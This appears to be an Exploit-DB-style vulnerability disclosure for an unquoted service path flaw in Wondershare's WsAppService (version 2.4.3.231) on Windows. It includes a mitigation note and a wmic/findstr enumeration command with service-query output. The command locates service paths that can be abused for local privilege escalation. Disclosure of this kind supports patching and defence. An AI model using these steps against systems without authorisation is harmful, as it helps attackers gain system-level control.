header-logo
Suggest Exploit
vendor:
Wondershare Application Framework Service
by:
chuyreds
5.5
CVSS
MEDIUM
Unquoted Service Path
428
CWE
Product Name: Wondershare Application Framework Service
Affected Version From: 2.4.3.231
Affected Version To: 2.4.3.231
Patch Exists: NO
Related CWE:
CPE: a:wondershare:application_framework_service
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2019

Wondershare Application Framework Service – “WsAppService” Unquote Service Path

The Wondershare Application Framework Service (WsAppService) on Windows has an unquoted service path vulnerability. This vulnerability could allow an attacker to escalate privileges and execute arbitrary code with system level privileges.

Mitigation:

To mitigate this vulnerability, the vendor should update the software to ensure that the service path is properly quoted. Users should also ensure that they are running the latest version of the software and keep their systems up to date.
Source

Exploit-DB raw data:

# Exploit Title: Wondershare Application Framework Service - "WsAppService"  Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 2.4.3.231
# Tested on: Windows 10 Home Single Language
# CVE : N/A

#Service Info:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Application Framework Service	WsAppService	C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe	Auto


C:\Users\user>sc query WsAppService

NOMBRE_SERVICIO: WsAppService
        TIPO               : 10  WIN32_OWN_PROCESS
        ESTADO             : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        CÓD_SALIDA_WIN32   : 0  (0x0)
        CÓD_SALIDA_SERVICIO: 0  (0x0)
        PUNTO_COMPROB.     : 0x0
        INDICACIÓN_INICIO  : 0x0